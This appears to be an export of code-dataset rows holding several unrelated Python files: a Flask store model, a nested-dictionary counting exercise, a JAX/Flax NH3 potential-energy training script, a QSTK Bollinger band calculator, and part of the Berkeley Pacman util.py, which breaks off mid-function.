blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
07d7a9fbcc3f28e2e965359f30bdd4c646aa5d49 | ce0b0b3bc64b0adc0d3033b8e46e265affb840fe | /models/store.py | 11fb83dea72b54700ac6a9db997dc6670d8bd263 | [] | no_license | IvorryC/store-REST-API | 70a455cb36e50abbfddea84586ebe0e635d0cbcd | c392b50c2a10a219addc53356902206364038802 | refs/heads/master | 2023-03-31T13:26:43.971249 | 2021-04-06T16:52:18 | 2021-04-06T16:52:18 | 353,400,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py | from db import db
class StoreModel(db.Model):
    """SQLAlchemy model for a store row; each store owns a collection of items."""
    __tablename__ = 'stores'

    # Surrogate primary key.
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(80))
    # One-to-many link to ItemModel.  lazy='dynamic' makes `items` a query
    # object, so the item rows are only fetched when .all() (etc.) is called.
    items = db.relationship('ItemModel', lazy='dynamic')

    def __init__(self, name):
        self.name = name

    def json(self):
        """Serialize this store and all of its items to a plain dict."""
        return {'name': self.name, 'items': [item.json() for item in self.items.all()]}

    @classmethod
    def find_by_name(cls, name):
        """Return the first store with the given name, or None."""
        return cls.query.filter_by(name=name).first() # SELECT * FROM stores WHERE name=name LIMIT 1

    def save_to_db(self):
        # Insert (or update) this row and flush the session to the database.
        db.session.add(self)
        db.session.commit()

    def delete_from_db(self):
        db.session.delete(self)
        db.session.commit()
| [
"79863144+IvorryC@users.noreply.github.com"
] | 79863144+IvorryC@users.noreply.github.com |
a40a4ecba8a0939b655fec9e42d09501ca7c15b8 | 75ea6a8ecdb4ecdc3ba4bb7e5ae4bac050ae2ec0 | /CalFoodNum.py | 721b65171564e70d40f714819859e6373ba617ef | [] | no_license | Jokertion/Automate-the-boring-stuff-with-python | 9a8ffe80fa7ee1a0d1dc8a9d961fa239d54ab172 | ab9c89a0e0325e9e0cf591bf525549aa0ec11336 | refs/heads/master | 2020-03-14T23:29:13.453501 | 2018-08-03T14:17:09 | 2018-08-03T14:17:09 | 131,846,205 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | #计算不同客人带来的食物数量总数
# Count the total number of each food item brought by the guests.
# Skill demonstrated: working with nested dictionaries.
allGuests = {'Alice': {'apples':5, 'pretzes':12},
             'Bob': {'ham sandwiches':3, 'apples':2},
             'Carol': {'cups':3, 'apple pies':1}}

def totalBrought(guests, item):
    """Return the total quantity of `item` brought by all guests.

    guests maps guest name -> {food name: quantity}.  A guest who did not
    bring `item` contributes 0 (via dict.get's default).
    """
    numBrought = 0
    # Iterate over (guest name, foods-brought dict) pairs.
    for k, v in guests.items():
        # get() returns 0 when this guest's dict has no key `item`.
        numBrought = numBrought + v.get(item, 0)
    return numBrought

print ('Number of things being bought:')
# BUG FIX: the lookup key must match the dictionary key exactly; the original
# passed 'Apples' (capitalized), which never matched 'apples' and printed 0.
print (' - Apples         ' + str(totalBrought(allGuests, 'apples')))
print (' - Cups           ' + str(totalBrought(allGuests, 'cups')))
print (' - Cakes          ' + str(totalBrought(allGuests, 'cakes')))
print (' - Ham sandwiches ' + str(totalBrought(allGuests, 'ham sandwiches')))
print (' - apple pies     ' + str(totalBrought(allGuests, 'apple pies')))
| [
"noreply@github.com"
] | noreply@github.com |
c34a56a3b9059e6d0d4b4de947865f0f49f3cb74 | 76db78a7acad70c1b623e2f67fdffda619a82fee | /nn_grad_nh3_batch_flax_val_test.py | 20228e1ccc4b6c3fedd9a4ea78b341a37001a837 | [] | no_license | RodrigoAVargasHdz/ad_nn_grad_reg_opt_jax | fcd9350dc4139e0c47d6e522a18175bab6197d38 | bc3b4670b8903e351f2d47b02a58030ad88e2f6a | refs/heads/master | 2023-05-03T13:28:48.561134 | 2021-05-26T20:27:15 | 2021-05-26T20:27:15 | 369,264,975 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,541 | py | import os
import argparse
import time
import datetime
import itertools
import numpy.random as onpr
import jax
import jax.numpy as jnp
from jax import jit, vmap, random
from jax import value_and_grad, grad, jacfwd, jacrev
# from jax.experimental import optimizers
from jax.config import config
config.update("jax_debug_nans", True)
jax.config.update('jax_enable_x64', True)
from flax.core.frozen_dict import freeze, unfreeze,FrozenDict
from flax import serialization, jax_utils
from flax import linen as nn
from flax import optim
#ravh
from data import *
from flax_mlp import *
# mase to jax
# from monomials import f_monomials as f_mono
# from polynomials import f_polynomials as f_poly
Ha2cm = 220000
r_dir = 'Results_nn_adiab'
# --------------------------------
def load_data(file_results, N, l):
    """Load cached train/validation splits when available, else build them.

    Returns (Dtr, Dval, Dt) where Dtr is the tuple (Xtr, gXtr, gXctr, ytr).
    When `file_results` exists, train/validation come from that file and the
    full data set is rebuilt via Data_nh3(); otherwise all three splits are
    generated from scratch with seed label `l`.
    """
    if os.path.isfile(file_results):
        cached = jnp.load(file_results, allow_pickle=True)
        Dtr = cached.item()['Dtr']
        Dval = cached.item()['Dval']
        Dt = Data_nh3()
    else:
        Dtr, Dval, Dt = split_trainig_val_test_coup(N, l)
    Xtr, gXtr, gXctr, ytr = Dtr
    return (Xtr, gXtr, gXctr, ytr), Dval, Dt
# ---------------------------------------------
def main_opt(N,l,i0,nn_arq,act_fun,n_epochs,lr,w_decay,rho_g):
    """Train the adiabatic NN with gradient regularization, while tuning the
    gradient-loss weights on the validation set in an outer loop.

    N        -- number of training points
    l        -- data-split seed label
    i0       -- RNG seed for the network initialization
    nn_arq   -- hidden-layer widths (an output layer of width 3 is appended)
    act_fun  -- activation-function name (logged only in this function)
    n_epochs -- inner-loop epochs per outer (validation) step
    lr, w_decay -- Adam learning rate / weight decay for the inner loop
    rho_g    -- gradient weight from the CLI (logged; the optimized weights
                are re-initialized randomly below)
    """
    start_time = time.time()

    str_nn_arq = ''
    for item in nn_arq:
        str_nn_arq = str_nn_arq + '_{}'.format(item)

    # File names for the log, the saved weights and the cached data splits.
    f_job = 'nn_arq{}_N_{}_i0_{}_l_{}_batch'.format(str_nn_arq,N,i0,l)
    f_out = '{}/out_opt_{}.txt'.format(r_dir,f_job)
    f_w_nn = '{}/W_{}.npy'.format(r_dir,f_job)
    file_results = '{}/data_nh3_{}.npy'.format(r_dir,f_job)
    # --------------------------------------
    # Data
    n_atoms = 4
    batch_size = 768 #1024#768#512#256#128#64#32
    Dtr,Dval,Dt = load_data(file_results,N,l)
    Xtr,gXtr,gXctr,ytr = Dtr
    Xval,gXval,gXcval, yval = Dval
    Xt,gXt,gXct,yt = Dt
    print(gXtr.shape,gXtr.shape,gXctr.shape,ytr.shape)
    # --------------------------------
    # BATCHES
    n_complete_batches, leftover = divmod(N, batch_size)
    n_batches = n_complete_batches + bool(leftover)

    def data_stream():
        # Endless generator of shuffled mini-batches (numpy RNG, fixed seed 0).
        rng = onpr.RandomState(0)
        while True:
            perm = rng.permutation(N)
            for i in range(n_batches):
                batch_idx = perm[i * batch_size:(i + 1) * batch_size]
                yield Xtr[batch_idx],gXtr[batch_idx], gXctr[batch_idx], ytr[batch_idx]
    batches = data_stream()
    # --------------------------------
    # Log the run configuration.
    f = open(f_out,'a+')
    print('-----------------------------------',file=f)
    print('Starting time', file=f)
    print(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), file=f)
    print('-----------------------------------',file=f)
    print(f_out,file=f)
    print('N = {}, n_atoms = {}, data_random = {}, NN_random = {}'.format(N,n_atoms,l,i0),file=f)
    print(nn_arq,file=f)
    print('lr = {}, w decay = {}'.format(lr,w_decay),file=f)
    print('Activation function = {}'.format(act_fun),file=f)
    print('N Epoch = {}'.format(n_epochs),file=f)
    print('rho G = {}'.format(rho_g),file=f)
    print('-----------------------------------',file=f)
    f.close()
    # --------------------------------------
    # initialize NN
    nn_arq.append(3)  # NOTE: mutates the caller's list; appends the output layer
    tuple_nn_arq = tuple(nn_arq)
    nn_model = NN_adiab(n_atoms,tuple_nn_arq)

    def get_init_NN_params(key):
        # Initialize Flax parameters by tracing a single training sample.
        x = Xtr[0,:]
        x = x[None,:]# x = jnp.ones((1,Xtr.shape[1]))
        variables = nn_model.init(key, x)
        return variables

    # Initilialize parameters
    rng = random.PRNGKey(i0)
    rng, subkey = jax.random.split(rng)
    params = get_init_NN_params(subkey)

    # Warm start: restore weights from a previous run when the file exists.
    f = open(f_out,'a+')
    if os.path.isfile(f_w_nn):
        print('Reading NN parameters from prev calculation!',file=f)
        print('-----------------------',file=f)
        nn_dic = jnp.load(f_w_nn,allow_pickle=True)
        params = unfreeze(params)
        params['params'] = nn_dic.item()['params']
        params = freeze(params)
        # print(params)
    f.close()
    init_params = params
    # --------------------------------------
    # Phys functions
    @jit
    def nn_adiab(params,x):
        # Forward pass: adiabatic energies for a batch of geometries.
        y_ad_pred = nn_model.apply(params,x)
        return y_ad_pred

    @jit
    def jac_nn_adiab(params,x):
        # Jacobian of the two adiabatic energies w.r.t. one input geometry.
        g_y_pred = jacrev(nn_adiab,argnums=1)(params,x[None,:])
        return jnp.reshape(g_y_pred,(2,g_y_pred.shape[-1]))
    # --------------------------------------
    # training loss functions
    @jit
    def f_loss_ad_energy(params,batch):
        # Per-state L2 norm of the energy residuals.
        X_inputs,_,_,y_true = batch
        y_pred = nn_adiab(params,X_inputs)
        diff_y = y_pred - y_true #Ha2cm*
        return jnp.linalg.norm(diff_y,axis=0)

    @jit
    def f_loss_jac(params,batch):
        # L2 norms of the gradient residuals, one per electronic state.
        X_inputs, gX_inputs,_,y_true = batch
        gX_pred = vmap(jac_nn_adiab,(None,0))(params,X_inputs)
        diff_g_X = gX_pred - gX_inputs
        # jnp.linalg.norm(diff_g_X,axis=0)
        diff_g_X0 = diff_g_X[:,0,:]
        diff_g_X1 = diff_g_X[:,1,:]
        l0 = jnp.linalg.norm(diff_g_X0)
        l1 = jnp.linalg.norm(diff_g_X1)
        return jnp.stack([l0,l1])
    # ------
    @jit
    def f_loss(params,rho_g,batch):
        # Total loss: energy term + exp(rho_g)-weighted gradient terms.
        # rho_g is stored in log space so the weights stay positive.
        rho_g = jnp.exp(rho_g)
        loss_ad_energy = f_loss_ad_energy(params,batch)
        loss_jac_energy = f_loss_jac(params,batch)
        loss = jnp.vdot(jnp.ones_like(loss_ad_energy),loss_ad_energy) + jnp.vdot(rho_g,loss_jac_energy)
        return loss
    # --------------------------------------
    # Optimization and Training
    # Perform a single training step.
    @jit
    def train_step(optimizer,rho_g,batch):#, learning_rate_fn, model
        grad_fn = jax.value_and_grad(f_loss)
        loss, grad = grad_fn(optimizer.target,rho_g,batch)
        optimizer = optimizer.apply_gradient(grad) #, {"learning_rate": lr}
        return optimizer, (loss, grad)

    # @jit
    def train(rho_g,nn_params):
        # Inner loop: optimize the network weights for fixed rho_g.
        optimizer = optim.Adam(learning_rate=lr,weight_decay=w_decay).create(nn_params)
        optimizer = jax.device_put(optimizer)
        train_loss = []
        loss0 = 1E16       # NOTE(review): unused below -- leftover best-loss tracking
        loss0_tot = 1E16
        itercount = itertools.count()
        f_params = init_params
        for epoch in range(n_epochs):
            for _ in range(n_batches):
                optimizer, loss_and_grad = train_step(optimizer,rho_g,next(batches))
                loss, grad = loss_and_grad
                # f = open(f_out,'a+')
                # print(i,loss,file=f)
                # f.close()
                train_loss.append(loss)
                # params = optimizer.target
                # loss_tot = f_validation(params)
        nn_params = optimizer.target
        return nn_params,loss_and_grad, train_loss

    @jit
    def val_step(optimizer,nn_params):#, learning_rate_fn, model
        # Outer step: retrain the network, then take one gradient step on
        # rho_g to reduce the validation loss.
        # NOTE(review): this is @jit-decorated yet calls train(), which runs a
        # Python loop with side effects -- confirm tracing behaves as intended.
        rho_g_prev = optimizer.target
        nn_params, loss_and_grad_train, train_loss_iter = train(rho_g_prev,nn_params)
        loss_train, grad_loss_train = loss_and_grad_train
        grad_fn_val = jax.value_and_grad(f_loss, argnums=1)
        loss_val, grad_val = grad_fn_val(nn_params,optimizer.target,Dval)
        optimizer = optimizer.apply_gradient(grad_val) #, {"learning_rate": lr}
        return optimizer, nn_params, (loss_val,loss_train,train_loss_iter), (grad_loss_train,grad_val)

    # Initilialize rho_G
    rng = random.PRNGKey(0)
    rng, subkey = jax.random.split(rng)
    rho_G0 = random.uniform(subkey,shape=(2,),minval=5E-4, maxval=0.025)
    rho_G0 = jnp.log(rho_G0)  # optimize in log space
    print('Initial lambdas',rho_G0)
    init_G = rho_G0#
    optimizer_out = optim.Adam(learning_rate=2E-4,weight_decay=0.).create(init_G)
    optimizer_out = jax.device_put(optimizer_out)
    f_params = init_params
    # Outer optimization loop over the gradient weights rho_g.
    for i in range(50000):
        start_va_time = time.time()
        optimizer_out, f_params, loss_all, grad_all = val_step(optimizer_out, f_params)
        rho_g = optimizer_out.target
        loss_val,loss_train,train_loss_iter = loss_all
        grad_loss_train,grad_val = grad_all
        loss0_tot = f_loss(f_params,rho_g,Dt)
        # Checkpoint the current weights every outer iteration.
        dict_output = serialization.to_state_dict(f_params)
        jnp.save(f_w_nn,dict_output)#unfreeze()
        f = open(f_out,'a+')
        # print(i,rho_g, loss0, loss0_tot, (time.time() - start_va_time),file=f)
        print(i,loss_val,loss_train, (time.time() - start_va_time),file=f)
        print(jnp.exp(rho_g), file=f)
        print(grad_val, file=f)
        # print(train_loss_iter ,file=f)
        # print(grad_val,file=f)
        # print(grad_loss_train,file=f)
        f.close()
    # --------------------------------------
    # Prediction
    f = open(f_out,'a+')
    print('Prediction of the entire data set', file=f)
    print('N = {}, n_atoms = {}, random = {}'.format(N,n_atoms,i0),file=f)
    print('NN : {}'.format(nn_arq),file=f)
    print('lr = {}, w decay = {}, rho G = {}'.format(lr,w_decay,rho_g),file=f)
    print('Activation function = {}'.format(act_fun),file=f)
    print('Total points = {}'.format(yt.shape[0]),file=f)

    y_pred = nn_adiab(f_params, Xt)
    gX_pred = vmap(jac_nn_adiab,(None,0))(f_params,Xt)

    diff_y = y_pred - yt
    rmse_Ha = jnp.linalg.norm(diff_y)
    rmse_cm = jnp.linalg.norm(Ha2cm*diff_y)
    mae_Ha = jnp.linalg.norm(diff_y,ord=1)
    mae_cm = jnp.linalg.norm(Ha2cm*diff_y,ord=1)
    print('RMSE = {} [Ha]'.format(rmse_Ha),file=f)
    # NOTE(review): loss0 is local to train() and not defined in this scope;
    # the next line (and 'loss_tr' below) would raise NameError if executed.
    print('RMSE(tr) = {} [cm-1]'.format(loss0),file=f)
    print('RMSE = {} [cm-1]'.format(rmse_cm),file=f)
    print('MAE = {} [Ha]'.format(mae_Ha),file=f)
    print('MAE = {} [cm-1]'.format(mae_cm),file=f)

    Dpred = jnp.column_stack((Xt,y_pred))
    data_dic = {'Dtr':Dtr,
                'Dpred': Dpred,
                'gXpred': gX_pred,
                'loss_tr':loss0,
                'error_full':rmse_cm,
                'N':N,
                'l':l,
                'i0':i0,
                'rho_g':rho_g}
    jnp.save(file_results,data_dic)

    print('---------------------------------', file=f)
    print('Total time = %.6f seconds ---'% ((time.time() - start_time)), file=f)
    print('---------------------------------', file=f)
    f.close()
def main():
    """Parse the command-line options and launch a single training run."""
    parser = argparse.ArgumentParser(description='opt PIP-NN')
    parser.add_argument('--N', type=int, default=3500, help='initeger data')
    parser.add_argument('--l', type=int, default=0, help='training data label')
    parser.add_argument('--i', type=int, default=0, help='random integer NN')
    parser.add_argument('--f', type=str, default='tanh', help='activation function')
    parser.add_argument('--lr', type=float, default=5E-4, help='learning rate')
    parser.add_argument('--wdecay', type=float, default=1E-3, help='weight decay')
    parser.add_argument('--lG', type=float, default=1E-2, help='lambda gradient')
    parser.add_argument('--n_epoch', type=int, default=5000, help='number of epochs')
    parser.add_argument('-nn', '--list', help='NN arq', type=str)
    args = parser.parse_args()

    # '--list' arrives as a comma-separated string of layer widths, e.g. "64,64".
    hidden_layers = [int(width) for width in args.list.split(',')]

    main_opt(args.N, args.l, args.i, hidden_layers, args.f,
             args.n_epoch, args.lr, args.wdecay, args.lG)
'''
lr_ = jnp.array([5E-5])#2E-3,
for lr in lr_:
nn_arq = [int(item) for item in args.list.split(',')]
main_opt(N,l,i0,nn_arq,act_fun,n_epochs,lr,w_decay)
'''
if __name__ == "__main__":
main()
'''
start_time = time.time()
loss_val = f_validation(params)
loss_jac_val = f_jac_validation(params)
loss_nac_val = f_nac_validation(params)
print('Tot adiab energies loss = ', loss_val)
print('Tot jac adiab energies loss = ', loss_jac_val)
print('Tot nac loss = ', loss_nac_val)
print('Total time = %.6f seconds ---'% ((time.time() - start_time)))
assert 0
# norm_gXt = jnp.linalg.norm(gXt,axis=2)
# j0 = jnp.argmax(norm_gXt,axis=0)
# rho_g = 10.0*(jnp.amax(ytr))**2/jnp.vdot(norm_gXt[j0],norm_gXt[j0])
# --------------------------------------
# Validation loss functions
@jit
def f_validation(params):
y_pred = nn_adiab(params, Xt)
diff_y = y_pred - yt
z = jnp.linalg.norm(diff_y)
return z
@jit
def f_jac_validation(params):
gX_pred = vmap(jac_nn_adiab,(None,0))(params,Xt)
diff_y = gX_pred - gXt
z = jnp.linalg.norm(diff_y)
return z
'''
| [
"rvargas@v.cluster.local"
] | rvargas@v.cluster.local |
f66250f2efc426debd99c6fa3183d92c689f2d92 | 50220bca2bb555f4969b84bb494d18744bb7321d | /homework/hw5/bollinger.py | 8a411c2a8586c0290b3ee4dfe9b7d66d4c3716e0 | [] | no_license | afcarl/coursera-compinvesting1 | 83eee4ceaaeecdc772f8eb39d4a2e005a805d662 | 2129d9b7b03d0f6eb1b8dbbce91213b5112795f1 | refs/heads/master | 2020-08-22T15:08:43.140251 | 2017-03-26T18:45:44 | 2017-03-26T18:45:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,542 | py | #!/bin/python
import sys
import datetime as dt
import pandas as pd
import numpy as np
import QSTK.qstkutil.qsdateutil as du
import QSTK.qstkutil.DataAccess as da
# Input
# dt_start, dt_end, loopback_days
# Idea
# Keep three dataframes to contain the moving average, moving stddev and
# bollinger values
def fetch_close_prices(dt_start, dt_end, ls_symbols):
# Close is at 4 PM
ldt_timestamps = du.getNYSEdays(dt_start, dt_end, dt.timedelta(hours=16))
dataobj = da.DataAccess('Yahoo')
ls_keys = ['open', 'high', 'low', 'close', 'volume', 'actual_close']
ldf_data = dataobj.get_data(ldt_timestamps, ls_symbols, ls_keys)
d_data = dict(zip(ls_keys, ldf_data))
for s_key in ls_keys:
d_data[s_key] = d_data[s_key].fillna(method='ffill')
d_data[s_key] = d_data[s_key].fillna(method='bfill')
d_data[s_key] = d_data[s_key].fillna(1.0)
# Get the numpy dnarray of close prices
na_price = d_data['close'].values
# Convert to a dataframe
df_closingprices = pd.DataFrame(na_price, columns=ls_symbols, index=ldt_timestamps)
return df_closingprices
def build_bollinger_bands(df_closingprices, lookback_days):
# get the symbols of ot fhte data frame
ls_symbols = df_closingprices.columns.values
# print ls_symbols
# temporary empty np_array
na_tmp = np.zeros((len(df_closingprices.values), 0))
df_moving_avg = pd.DataFrame(na_tmp, index=df_closingprices.index)
df_moving_stddev = pd.DataFrame(na_tmp, index=df_closingprices.index)
df_bollinger_upper = pd.DataFrame(na_tmp, index=df_closingprices.index)
df_bollinger_lower = pd.DataFrame(na_tmp, index=df_closingprices.index)
df_bollinger_value = pd.DataFrame(na_tmp, index=df_closingprices.index)
k = 1 # multiple of standard deviations
for symbol in ls_symbols:
# calculate the moving average
df_moving_avg[symbol] = df_closingprices[symbol].rolling(window=lookback_days, center=False).mean()
df_moving_stddev[symbol] = df_closingprices[symbol].rolling(window=lookback_days, center=False).std()
# @see http://stackoverflow.com/a/37668191
df_bollinger_upper[symbol] = df_moving_avg[symbol] + df_moving_stddev[symbol] * k
df_bollinger_lower[symbol] = df_moving_avg[symbol] - df_moving_stddev[symbol] * k
df_bollinger_value[symbol] = (df_closingprices[symbol] - df_moving_avg[symbol])/df_moving_stddev[symbol]
return df_moving_avg, df_moving_stddev, df_bollinger_upper, df_bollinger_lower, df_bollinger_value
def main():
dt_start = dt.datetime.strptime(sys.argv[1], '%m-%d-%Y')
dt_end = dt.datetime.strptime(sys.argv[2], '%m-%d-%Y')
n_lookback = int(sys.argv[3])
# print dt_start, dt_end, n_lookback
ls_symbols = ['AAPL', 'GOOG', 'IBM', 'MSFT']
df_closingprices = fetch_close_prices(dt_start, dt_end, ls_symbols)
# print df_closingprices
# build bollinger bands
df_moving_avg, df_moving_stddev, df_bollinger_upper, df_bollinger_lower, df_bollinger_value = build_bollinger_bands(df_closingprices, n_lookback)
# print "Moving Average\n", df_moving_avg
# print "Moving Stddev\n", df_moving_stddev
# print "Bollinger Upper\n", df_bollinger_upper
# print "Bollinger Lower\n", df_bollinger_lower
print "Bollinger Value\n", df_bollinger_value
if __name__ == '__main__':
if len(sys.argv) != 4:
print """ Usage: python bollinger.py start_date end_date lookback_days
Dates are in mm-dd-yyyy format
"""
sys.exit(0)
main()
| [
"brad@beaconhill.com"
] | brad@beaconhill.com |
9974261abc74319703ef35628bb1f321b6e39c26 | 84eaaa07532efbde535a52d29e8180dad357fbdd | /util.py | 60f219c5bbae0c0e7adf694df70663c56ce13229 | [] | no_license | jangwoopark/pacman-search | 3ade9823f2d21b70513d64993f4ce008931b6f4a | 7f88ba9c322b4af81979fef61cead4f19e9b9fdc | refs/heads/master | 2021-08-07T21:19:43.753609 | 2017-11-09T01:12:23 | 2017-11-09T01:12:23 | 110,048,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,222 | py | # util.py
# -------
# Licensing Information: Please do not distribute or publish solutions to this
# project. You are free to use and extend these projects for educational
# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by
# John DeNero (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# For more info, see http://inst.eecs.berkeley.edu/~cs188/sp09/pacman.html
import sys
import inspect
import heapq, random
"""Data structures useful for implementing SearchAgents."""
class Stack:
    """A last-in-first-out (LIFO) container backed by a Python list."""

    def __init__(self):
        self.list = []

    def push(self, item):
        """Place 'item' on top of the stack."""
        self.list.append(item)

    def pop(self):
        """Remove and return the item pushed most recently."""
        return self.list.pop()

    def isEmpty(self):
        """True when the stack holds no items."""
        return not self.list
class Queue:
    """A first-in-first-out (FIFO) container backed by a Python list.

    New items go to the front of the list, so popping from the end yields
    the earliest enqueued item.
    """

    def __init__(self):
        self.list = []

    def push(self, item):
        """Enqueue 'item'."""
        self.list.insert(0, item)

    def pop(self):
        """Dequeue and return the earliest enqueued item still present."""
        return self.list.pop()

    def isEmpty(self):
        """True when the queue holds no items."""
        return not self.list
class PriorityQueue:
    """Min-priority queue built on a binary heap (heapq).

    Each entry is stored as a (priority, item) pair and the entry with the
    smallest priority is retrieved first, in O(log n).  Priorities of stored
    items cannot be changed, but the same item may be pushed again with a
    different priority.
    """

    def __init__(self):
        self.heap = []

    def push(self, item, priority):
        heapq.heappush(self.heap, (priority, item))

    def pop(self):
        # NOTE: deliberately returns the whole (priority, item) pair --
        # this was modified from the original util.py, which returned item.
        return heapq.heappop(self.heap)

    def isEmpty(self):
        return not self.heap
class PriorityQueueWithFunction(PriorityQueue):
    """PriorityQueue exposing the one-argument push/pop of Queue and Stack.

    The priority of every pushed item is computed by a caller-supplied
    function, which makes this class a drop-in replacement for Queue/Stack.
    """

    def __init__(self, priorityFunction):
        """priorityFunction(item) -> priority"""
        self.priorityFunction = priorityFunction
        PriorityQueue.__init__(self)

    def push(self, item):
        """Enqueue 'item' under the priority computed by the function."""
        PriorityQueue.push(self, item, self.priorityFunction(item))
def manhattanDistance(xy1, xy2):
    """Return the Manhattan (L1) distance between points xy1 and xy2."""
    dx = abs(xy1[0] - xy2[0])
    dy = abs(xy1[1] - xy2[1])
    return dx + dy
"""Data structures and functions useful for various course projects
The search project should not need anything below this line.
"""
class Counter(dict):
    """A counter keeps track of counts for a set of keys.

    The counter class is an extension of the standard python
    dictionary type.  It is specialized to have number values
    (integers or floats), and includes a handful of additional
    functions to ease the task of counting data.  In particular,
    all keys are defaulted to have value 0.  Using a dictionary:

    a = {}
    print a['test']

    would give an error, while the Counter class analogue:

    >>> a = Counter()
    >>> print a['test']
    0

    returns the default 0 value. Note that to reference a key
    that you know is contained in the counter,
    you can still use the dictionary syntax:

    >>> a = Counter()
    >>> a['test'] = 2
    >>> print a['test']
    2

    This is very useful for counting things without initializing their counts,
    see for example:

    >>> a['blah'] += 1
    >>> print a['blah']
    1

    The counter also includes additional functionality useful in implementing
    the classifiers for this assignment.  Two counters can be added,
    subtracted or multiplied together.  See below for details.  They can
    also be normalized and their total count and arg max can be extracted.

    NOTE: this class targets Python 2 -- several methods rely on dict.items()
    returning an indexable, sortable list.
    """
    def __getitem__(self, idx):
        # Default missing keys to 0 (and store that default) before lookup.
        self.setdefault(idx, 0)
        return dict.__getitem__(self, idx)

    def incrementAll(self, keys, count):
        """Increments all elements of keys by the same count.

        >>> a = Counter()
        >>> a.incrementAll(['one','two', 'three'], 1)
        >>> a['one']
        1
        >>> a['two']
        1
        """
        for key in keys:
            self[key] += count

    def argMax(self):
        """Returns the key with the highest value.
        """
        if len(self.keys()) == 0: return None
        # NOTE: indexing items() requires Python 2 (lists, not views).
        all = self.items()
        values = [x[1] for x in all]
        maxIndex = values.index(max(values))
        return all[maxIndex][0]

    def sortedKeys(self):
        """Returns a list of keys sorted by their values.  Keys
        with the highest values will appear first.

        >>> a = Counter()
        >>> a['first'] = -2
        >>> a['second'] = 4
        >>> a['third'] = 1
        >>> a.sortedKeys()
        ['second', 'third', 'first']
        """
        sortedItems = self.items()
        # Sort by descending value; list.sort(cmp=...) is Python 2 only.
        compare = lambda x, y:  sign(y[1] - x[1])
        sortedItems.sort(cmp=compare)
        return [x[0] for x in sortedItems]

    def totalCount(self):
        """Returns the sum of counts for all keys.
        """
        return sum(self.values())

    def normalize(self):
        """Edits the counter such that the total count of all
        keys sums to 1.  The ratio of counts for all keys
        will remain the same. Note that normalizing an empty
        Counter will result in an error.
        """
        total = float(self.totalCount())
        if total == 0: return
        for key in self.keys():
            self[key] = self[key] / total

    def divideAll(self, divisor):
        """Divides all counts by divisor
        """
        divisor = float(divisor)
        for key in self:
            self[key] /= divisor

    def copy(self):
        """Returns a copy of the counter
        """
        return Counter(dict.copy(self))

    def __mul__(self, y ):
        """Multiplying two counters gives the dot product of their vectors where
        each unique label is a vector element.

        >>> a = Counter()
        >>> b = Counter()
        >>> a['first'] = -2
        >>> a['second'] = 4
        >>> b['first'] = 3
        >>> b['second'] = 5
        >>> a['third'] = 1.5
        >>> a['fourth'] = 2.5
        >>> a * b
        14
        """
        sum = 0
        x = self
        # Iterate over the smaller counter for efficiency.
        if len(x) > len(y):
            x,y = y,x
        for key in x:
            if key not in y:
                continue
            sum += x[key] * y[key]
        return sum

    def __radd__(self, y):
        """Adding another counter to a counter increments the current counter
        by the values stored in the second counter.

        >>> a = Counter()
        >>> b = Counter()
        >>> a['first'] = -2
        >>> a['second'] = 4
        >>> b['first'] = 3
        >>> b['third'] = 1
        >>> a += b
        >>> a['first']
        1
        """
        # NOTE(review): mutates self in place and returns None -- only hit
        # when the left operand is not a Counter; confirm intended semantics.
        for key, value in y.items():
            self[key] += value

    def __add__( self, y ):
        """Adding two counters gives a counter with the union of all keys and
        counts of the second added to counts of the first.

        >>> a = Counter()
        >>> b = Counter()
        >>> a['first'] = -2
        >>> a['second'] = 4
        >>> b['first'] = 3
        >>> b['third'] = 1
        >>> (a + b)['first']
        1
        """
        addend = Counter()
        for key in self:
            if key in y:
                addend[key] = self[key] + y[key]
            else:
                addend[key] = self[key]
        for key in y:
            if key in self:
                continue
            addend[key] = y[key]
        return addend

    def __sub__( self, y ):
        """Subtracting a counter from another gives a counter with the union of all keys and
        counts of the second subtracted from counts of the first.

        >>> a = Counter()
        >>> b = Counter()
        >>> a['first'] = -2
        >>> a['second'] = 4
        >>> b['first'] = 3
        >>> b['third'] = 1
        >>> (a - b)['first']
        -5
        """
        addend = Counter()
        for key in self:
            if key in y:
                addend[key] = self[key] - y[key]
            else:
                addend[key] = self[key]
        for key in y:
            if key in self:
                continue
            addend[key] = -1 * y[key]
        return addend
def raiseNotDefined():
    # Report the name of the calling method (taken from the interpreter
    # stack) and abort the program.  Python 2 print statement.
    print "Method not implemented: %s" % inspect.stack()[1][3]
    sys.exit(1)
def normalize(vectorOrCounter):
    """Normalize a vector or Counter by dividing every value by the sum of
    all values.  A zero total returns the input unchanged.
    """
    normalizedCounter = Counter()
    if type(vectorOrCounter) == type(normalizedCounter):
        counter = vectorOrCounter
        total = float(counter.totalCount())
        if total == 0:
            return counter
        for key in counter.keys():
            normalizedCounter[key] = counter[key] / total
        return normalizedCounter
    else:
        vector = vectorOrCounter
        s = float(sum(vector))
        if s == 0:
            return vector
        return [el / s for el in vector]
def nSample(distribution, values, n):
    """Draw n samples from the discrete distribution over 'values'.

    Uses n sorted uniform draws walked against the cumulative distribution,
    so the whole batch is produced in one pass.
    """
    if sum(distribution) != 1:
